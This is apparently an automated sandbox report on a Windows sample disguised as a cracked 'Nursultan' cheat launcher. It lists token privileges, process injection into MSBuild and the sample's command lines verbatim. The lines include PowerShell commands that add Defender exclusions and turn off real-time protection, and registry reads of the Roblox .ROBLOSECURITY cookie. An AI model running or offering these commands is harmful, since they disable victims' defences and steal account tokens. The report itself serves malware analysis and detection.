Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5084 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 5084 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 5084 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
PID 5084 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
PID 5084 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\SYSTEM32\attrib.exe
PID 4640 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\SYSTEM32\attrib.exe
PID 4640 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 5084 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 5084 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 5084 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
PID 5084 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
PID 4640 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4640 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2160 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2160 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 4640 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 2160 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 2160 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 2160 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2160 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 4640 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 4640 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 4640 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 4640 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2160 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
PID 2160 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
PID 2160 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2160 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 4640 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 2160 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\Conhost.exe
PID 2160 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\Conhost.exe
PID 2160 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\Conhost.exe
PID 2160 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
PID 2160 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
PID 2540 wrote to memory of 2076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

